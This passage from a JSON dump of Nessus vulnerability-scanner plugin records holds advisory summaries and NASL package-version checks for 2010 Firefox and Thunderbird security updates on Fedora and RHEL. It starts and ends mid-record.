value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642300\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=646997\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050153.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b38de3df\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f01fc443\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050155.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?413f0147\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050156.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5084c6e0\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050157.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd4f6a09\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050158.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e237b4ed\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050159.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7b4c5e7c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:galeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-web-photo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"firefox-3.5.15-1.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"galeon-2.0.7-27.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"gnome-python2-extras-2.25.3-22.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"gnome-web-photo-0.9-11.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"mozvoikko-1.0-14.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"perl-Gtk2-MozEmbed-0.08-6.fc12.17\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"xulrunner-1.9.1.15-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / galeon / gnome-python2-extras / gnome-web-photo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-29T19:27:30", "references": ["https://access.redhat.com/security/cve/cve-2010-3175", "https://access.redhat.com/security/cve/cve-2010-3182", "https://access.redhat.com/security/cve/cve-2010-3180", "https://access.redhat.com/errata/RHSA-2010:0896", "https://access.redhat.com/security/cve/cve-2010-3183", "https://access.redhat.com/security/cve/cve-2010-3178", "https://access.redhat.com/security/cve/cve-2010-3179", "https://access.redhat.com/security/cve/cve-2010-3765", "https://access.redhat.com/security/cve/cve-2010-3176"], "pluginID": "50648", "description": "An updated thunderbird package that fixes several security issues is now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nA race condition flaw was found in the way Thunderbird handled Document Object Model (DOM) element properties. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed HTML mail content. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nA same-origin policy bypass flaw was found in Thunderbird. Remote HTML content could steal private data from different remote HTML content Thunderbird had loaded. (CVE-2010-3178)\n\nNote: JavaScript support is disabled by default in Thunderbird. The above issues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The LD_LIBRARY_PATH variable was appending a '.' character, which could allow a local attacker to execute arbitrary code with the privileges of a different user running Thunderbird, if that user ran Thunderbird from within an attacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which resolves these issues. All running instances of Thunderbird must be restarted for the update to take effect.", "edition": 10, "reporter": "Tenable", "published": "2010-11-18T00:00:00", "title": "RHEL 6 : thunderbird (RHSA-2010:0896)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-11-28T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:thunderbird", "p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2010-0896.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50648", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0896. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50648);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2018/11/28 11:42:05\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44425);\n script_xref(name:\"RHSA\", value:\"2010:0896\");\n\n script_name(english:\"RHEL 6 : thunderbird (RHSA-2010:0896)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated thunderbird package that fixes several security issues is\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nA race condition flaw was found in the way Thunderbird handled\nDocument Object Model (DOM) element properties. An HTML mail message\ncontaining malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Thunderbird. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed HTML mail\ncontent. An HTML mail message containing malicious content could cause\nThunderbird to crash or, potentially, execute arbitrary code with the\nprivileges of the user running Thunderbird. (CVE-2010-3175,\nCVE-2010-3176, CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nA same-origin policy bypass flaw was found in Thunderbird. Remote HTML\ncontent could steal private data from different remote HTML content\nThunderbird had loaded. (CVE-2010-3178)\n\nNote: JavaScript support is disabled by default in Thunderbird. The\nabove issues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The\nLD_LIBRARY_PATH variable was appending a '.' character, which could\nallow a local attacker to execute arbitrary code with the privileges\nof a different user running Thunderbird, if that user ran Thunderbird\nfrom within an attacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-3765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0896\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0896\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-debuginfo-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-debuginfo-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-3.1.6-1.el6_0\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:18", "references": ["http://www.nessus.org/u?1e41d79b", "https://bugzilla.redhat.com/show_bug.cgi?id=642286", "https://bugzilla.redhat.com/show_bug.cgi?id=642294", "http://www.nessus.org/u?bcf76dcb", "https://bugzilla.redhat.com/show_bug.cgi?id=642275", "http://www.nessus.org/u?2b115b82", "http://www.nessus.org/u?ebdf7518", "https://bugzilla.redhat.com/show_bug.cgi?id=642277", "https://bugzilla.redhat.com/show_bug.cgi?id=642283", "http://www.nessus.org/u?0aba3310", "http://www.nessus.org/u?d4ae1e85", "http://www.nessus.org/u?a0b91fe2", "http://www.nessus.org/u?4bea5fe2", "https://bugzilla.redhat.com/show_bug.cgi?id=642300", "https://bugzilla.redhat.com/show_bug.cgi?id=642272", "https://bugzilla.redhat.com/show_bug.cgi?id=642290"], "pluginID": "50356", "description": "Update to new upstream Firefox version 3.6.11, fixing multiple security issues detailed in the upstream advisories :\n\nhttp://www.mozilla.org/security/known-vulnerabilities/firefox36.html#f irefox3.6.11\n\nUpdate also includes all packages depending on gecko-libs rebuilt against new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2010-10-28T00:00:00", "title": "Fedora 13 : firefox-3.6.11-1.fc13 / galeon-2.0.7-34.fc13 / gnome-python2-extras-2.25.3-23.fc13 / etc (2010-16593)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2015-10-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xulrunner", "p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed", "cpe:/o:fedoraproject:fedora:13", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:gnome-web-photo", "p-cpe:/a:fedoraproject:fedora:galeon", "p-cpe:/a:fedoraproject:fedora:mozvoikko"], "id": "FEDORA_2010-16593.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50356", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-16593.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50356);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2015/10/20 21:13:52 $\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253);\n script_xref(name:\"FEDORA\", value:\"2010-16593\");\n\n script_name(english:\"Fedora 13 : firefox-3.6.11-1.fc13 / galeon-2.0.7-34.fc13 / gnome-python2-extras-2.25.3-23.fc13 / etc (2010-16593)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream Firefox version 3.6.11, fixing multiple\nsecurity issues detailed in the upstream advisories :\n\nhttp://www.mozilla.org/security/known-vulnerabilities/firefox36.html#f\nirefox3.6.11\n\nUpdate also includes all packages depending on gecko-libs rebuilt\nagainst new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#firefox3.6.11\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebdf7518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642300\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049829.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d4ae1e85\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049830.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b115b82\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bcf76dcb\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049832.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0aba3310\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049833.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4bea5fe2\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049834.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a0b91fe2\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049835.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e41d79b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:galeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-web-photo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"firefox-3.6.11-1.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"galeon-2.0.7-34.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"gnome-python2-extras-2.25.3-23.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"gnome-web-photo-0.9-13.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"mozvoikko-1.0-15.fc13\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"perl-Gtk2-MozEmbed-0.08-6.fc13.18\")) flag++;\nif (rpm_check(release:\"FC13\", reference:\"xulrunner-1.9.2.11-1.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / galeon / gnome-python2-extras / gnome-web-photo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-29T19:36:58", "references": ["https://usn.ubuntu.com/997-1/"], "pluginID": "50082", "description": "Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov, Josh Soref, Gary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski discovered various flaws in the browser engine. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-3175, CVE-2010-3176)\n\nAlexander Miller, Sergey Glazunov, and others discovered several flaws in the JavaScript engine. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nRobert Swiecki discovered that Firefox did not properly validate Gopher URLs. If a user were tricked into opening a crafted file via Gopher, an attacker could possibly run arbitrary JavaScript.\n(CVE-2010-3177)\n\nEduardo Vela Nava discovered that Firefox could be made to violate the same-origin policy by using modal calls with JavaScript. An attacker could exploit this to steal information from another site.\n(CVE-2010-3178)\n\nDmitri GribenkoDmitri Gribenko discovered that Firefox did not properly setup the LD_LIBRARY_PATH environment variable. A local attacker could exploit this to execute arbitrary code as the user invoking the program. (CVE-2010-3182).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 8, "reporter": "Tenable", "published": "2010-10-21T00:00:00", "title": "Ubuntu 8.04 LTS / 9.04 / 9.10 / 10.04 LTS / 10.10 : firefox, firefox-3.0, firefox-3.5, xulrunner-1.9.1, xulrunner-1.9.2 vulnerabilities (USN-997-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", 